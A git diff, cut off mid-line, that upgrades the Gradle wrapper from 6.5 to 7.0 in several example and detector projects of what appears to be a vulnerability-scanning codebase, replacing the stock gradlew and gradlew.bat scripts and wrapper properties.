a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties +++ b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/examples/example_payload_framework_vuln_detector/gradlew b/examples/example_payload_framework_vuln_detector/gradlew index fbd7c5158..1aa94a426 100755 --- a/examples/example_payload_framework_vuln_detector/gradlew +++ b/examples/example_payload_framework_vuln_detector/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/examples/example_payload_framework_vuln_detector/gradlew.bat b/examples/example_payload_framework_vuln_detector/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/examples/example_payload_framework_vuln_detector/gradlew.bat +++ b/examples/example_payload_framework_vuln_detector/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar and b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar differ diff --git a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties +++ b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/examples/example_vuln_detector/gradlew b/examples/example_vuln_detector/gradlew index fbd7c5158..1aa94a426 100755 --- a/examples/example_vuln_detector/gradlew +++ b/examples/example_vuln_detector/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/examples/example_vuln_detector/gradlew.bat b/examples/example_vuln_detector/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/examples/example_vuln_detector/gradlew.bat +++ b/examples/example_vuln_detector/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar and 